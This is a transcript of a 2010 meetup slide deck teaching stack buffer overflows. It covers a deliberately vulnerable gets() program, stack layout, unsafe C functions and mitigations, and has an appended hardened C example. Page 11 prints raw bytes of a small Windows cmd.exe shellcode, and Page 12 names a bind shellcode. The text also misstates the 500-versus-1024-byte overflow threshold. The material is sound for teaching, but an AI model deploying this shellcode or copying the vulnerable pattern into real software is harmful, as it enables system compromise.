Buffer Overflows by: Saurabh Sharma

Buffer Overflow Demo by Saurabh Sharma



Buffer Overflow Demo by Saurabh Sharma @ null Banglore Meet, June, 2010


Page 1: Buffer Overflow Demo by Saurabh Sharma


Page 2: BUFFER

Page 3: Anatomy of Buffer Overflows

Buffer: the memory area where the user input is stored.

Overflow: the user input exceeds the maximum size of the buffer, overwriting other areas of memory and corrupting them.

Page 4: A small example

    #include <stdio.h>

    /* Deliberately vulnerable: gets() has no length limit, so input longer
     * than buf is written past the end of the array on the stack. */
    void get_input(void) {
        char buf[1024];
        gets(buf);
    }

    int main(int argc, char *argv[]) {
        get_input();
        return 0;
    }

The user controls the input. A malicious user can supply input of more than 500 chars. So what? The user can supply a malicious input which executes some other exe. This can also be your cmd.exe and may lead to system compromise.

Page 5: Memory overview

Text: contains instructions

Data: contains initialized variables

BSS: contains uninitialized global and static variables (initialized to 0)

Heap: contains dynamic, uninitialized data (malloc())

Stack: contains function arguments and local variables

Page 6: Memory overview (continued)

Stack frame: holds the variables and data for a function.

The stack grows from higher memory locations to lower memory locations.

Heap: grows from lower to higher.

Page 7: REGISTERS

General purpose: for basic calculations.

ESI, EDI: used mostly with arrays.

Flags: the outcome of several instructions sets the flags.

Segment: code, stack, data.

EBP: base pointer, points to the beginning of the current stack frame.

ESP: stack pointer, points to the top of the stack.

EIP: instruction pointer, points to the next instruction.

Page 8: Stack Layout

The stack is a LIFO data structure: temporary memory, formed when a function is called.

A new stack frame is created when the function is called.

The return address is saved just above the local variables.

    Higher address
    +-------------------------+
    | parameters              |
    | Return addr (saved EIP) |
    | Saved EBP               |
    | Local variables         |
    +-------------------------+
    Lower address        (stack grows downward)

Page 9: Stack Layout (continued)

So, if the saved EIP can be controlled, the next instruction to be executed can be controlled.

(Same stack layout diagram as Page 8: parameters, return address (saved EIP), saved EBP, local variables, from higher to lower addresses.)

Page 10: SHELLCODE

Machine code which is injected into the overflown buffer.

It does the work for you.

WORK: executing a third program, adding an administrator, etc.

Page 11: EXAMPLE SHELLCODES (small)

win32/xp sp2 (En) cmd.exe, 23 bytes. Author: Mountassif Moad, A.K.A.:

    "\x8b\xec\x68\x65\x78\x65"
    "\x20\x68\x63\x6d\x64\x2e"
    "\x8d\x45\xf8\x50\xb8\x8D"
    "\x15\x86\x7C\xff\xd0";

Page 12: EXAMPLE SHELLCODES (bigger)

Bind shellcode by NRAZIZ, declared as char bindcode[]: binds to port 48138, password: haxor.

Page 13: DEMO

Page 14: MAJOR SNARES

Functions with no bound on how much they write into the destination buffer:

strcpy(), strcat(), sprintf(), scanf(), sscanf(), fscanf(), vfscanf(), vsprintf(), vscanf(), vsscanf(), streadd(), strecpy(), strtrns()

Page 15: PREVENTION

Buffer size must be checked.

Use alternative functions, e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src).

Other protection mechanisms: /GS (stack cookie), ASLR, SafeSEH compilation.
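The hardened counterparts to the get_input() of Page 4 and the strncpy() advice of Page 15, as an added example in C that is not from the deck. bounded_copy and get_input_safe are names chosen here; the 40-byte input is constructed. The point the slide leaves out is that strncpy() alone does not NUL-terminate when the source is at least dst_size-1 bytes long, so the terminator must be written explicitly.

```c
#include <stdio.h>
#include <string.h>

/* Bounded copy in the spirit of the slide's strncpy(dst, src, dst_size-1).
 * Returns 1 if src had to be truncated (an overflow was averted), else 0. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return 1;                         /* nothing can be stored at all */
    int truncated = strlen(src) >= dst_size;
    strncpy(dst, src, dst_size - 1);      /* copies at most dst_size-1 bytes */
    dst[dst_size - 1] = '\0';             /* strncpy does not guarantee this */
    return truncated;
}

/* Hardened replacement for the slide's get_input(): fgets() reads at most
 * buf_size-1 bytes where gets() reads without limit. If the line did not
 * fit, the rest of it is drained so it cannot be mistaken for the next line.
 * Returns 0 if the whole line fit, 1 if it was cut, -1 on EOF or error. */
int get_input_safe(FILE *in, char *buf, size_t buf_size)
{
    if (fgets(buf, (int)buf_size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';              /* strip the newline, line fit */
        return 0;
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 0;                         /* line exactly filled the buffer */
    while ((c = fgetc(in)) != EOF && c != '\n') {
        /* discard the overflowing tail of the line */
    }
    return 1;
}

int main(void)
{
    char buf[16];
    char long_input[41];                  /* constructed: 40 'A's, > sizeof buf */
    memset(long_input, 'A', 40);
    long_input[40] = '\0';
    int cut = bounded_copy(buf, sizeof buf, long_input);
    printf("stored \"%s\" (%zu bytes), truncated=%d\n", buf, strlen(buf), cut);
    return 0;
}
```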

Page 17: QUESTIONS

?????????????????